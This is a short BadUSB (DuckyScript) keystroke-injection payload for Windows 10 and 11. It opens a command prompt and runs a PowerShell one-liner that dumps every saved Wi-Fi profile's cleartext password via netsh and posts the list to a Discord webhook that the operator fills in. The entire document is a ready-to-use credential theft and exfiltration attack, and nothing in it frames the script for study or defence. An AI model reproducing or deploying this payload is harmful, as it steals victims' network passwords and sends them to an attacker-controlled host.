REM     Description: Grabs wifi passwords and uploads to Discord
REM     Target: Windows 10, 11

GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
STRING powershell "$w='<YOUR WEBHOOK HERE>';$p=(netsh wlan show profiles)|sls '\:(.+)$'|foreach{$_.Matches.Groups[1].Value.Trim()};$r='';foreach($n in $p){$i=(netsh wlan show profile name=\"$n\" key=clear);$k=($i|sls 'Key Content\W+\:(.+)$');if($k){$r+=\"$n : \"+$k.Matches.Groups[1].Value.Trim()+\"`n\"}else{$r+=\"$n : No Password`n\"}};$body=@{content=$r}|ConvertTo-Json -Compress;irm -Uri $w -Method Post -ContentType 'application/json' -Body ([System.Text.Encoding]::UTF8.GetBytes($body))"
ENTER
DELAY 200
STRING exit
ENTER